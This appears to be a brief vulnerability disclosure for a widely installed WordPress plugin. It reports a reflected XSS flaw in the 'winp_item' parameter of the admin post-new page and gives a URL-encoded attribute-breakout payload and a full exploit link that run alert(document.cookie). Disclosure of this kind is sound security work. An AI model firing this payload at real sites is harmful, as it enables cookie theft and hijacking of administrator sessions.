Business Details:
CMS: WordPress
Active Installations: +90k
Downloads: +677k
Technical Details:
Bug Type: Reflected XSS
Severity: Medium
Affected Parameter: winp_item
Affected Path: https://[WEBSITE]/wp-admin/post-new.php
Used Payload:
phpl159r%22+onload%3Dalert%28document.cookie%29+be0bpc32ao+onload%3Dalert%281%29+zqg
Full Link:
http://[WEBSITE]/wp-admin/post-new.php?post_type=wbcr-snippets&winp_item=phpl159r%22+onload%3Dalert%28document.cookie%29+be0bpc32ao+onload%3Dalert%281%29+zqggm
Proof of Concept:
Youtube Video